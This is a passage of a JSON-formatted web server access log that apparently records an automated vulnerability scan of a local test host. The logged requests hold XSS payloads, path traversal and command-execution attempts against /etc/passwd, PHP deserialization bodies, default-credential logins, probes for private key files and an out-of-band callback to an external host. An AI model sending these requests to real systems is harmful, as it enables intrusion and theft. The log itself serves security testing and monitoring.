"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.548","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.474","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.421","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.460","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.454","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.427","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"{\x22UserName\x22:\x22Administrator\x22,\x22Password\x22:\x2228fHqXF6JIHgZAFaLO8mNawYXtl\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /redfish/v1/SessionService/Sessions/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.455","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.454","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.383","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rootDesc.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.462","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.447","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.495","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.472","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.901","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.459","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.322","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /healthz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.465","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.773","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.678","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.866","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.456","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.450","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /404 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.702","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/19 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.310","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.475","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"aps=c9oms3gsmpve1ijt0mc0b1q63e53zo1jq.oast.live&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.362","http_user_agent":"asusrouter--", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.444","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name 